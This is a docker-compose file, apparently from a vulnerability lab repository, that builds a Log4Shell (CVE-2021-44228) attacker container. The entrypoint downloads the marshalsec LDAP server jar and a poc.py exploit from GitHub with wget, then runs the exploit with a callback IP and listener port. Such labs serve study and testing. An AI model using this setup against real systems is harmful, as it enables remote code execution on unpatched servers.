services:
  attacker_ldap_server:
    image: python:3.8-alpine
    container_name: log4shell_attacker
    ports:
        - "1389:1389"
        - "8000:8000"
    entrypoint: ["sh", "-c", "apk update && \
                              apk add openjdk8-jre && \
                              apk add openjdk8 && \
                              apk add gcc g++ make libffi-dev openssl-dev && \
                              apk add wget tar && \
                              pip install colorama && \
                              pip install argparse && \
                              pip install pathlib && \
                              pip install httplib2 && \
                              mkdir -p /target && \
                              wget -c -O /target/marshalsec-0.0.3-SNAPSHOT-all.jar https://raw.githubusercontent.com/gngn-dev/kr-vulhub/main/log4j/CVE-2021-44228/docker_attacker-ldap-server/target/marshalsec-0.0.3-SNAPSHOT-all.jar && \
                              wget -c -O /poc.py https://raw.githubusercontent.com/gngn-dev/kr-vulhub/main/log4j/CVE-2021-44228/docker_attacker-ldap-server/poc.py && \
                              python /poc.py --userip 10.0.2.15 --webport 8000 --lport 9001"]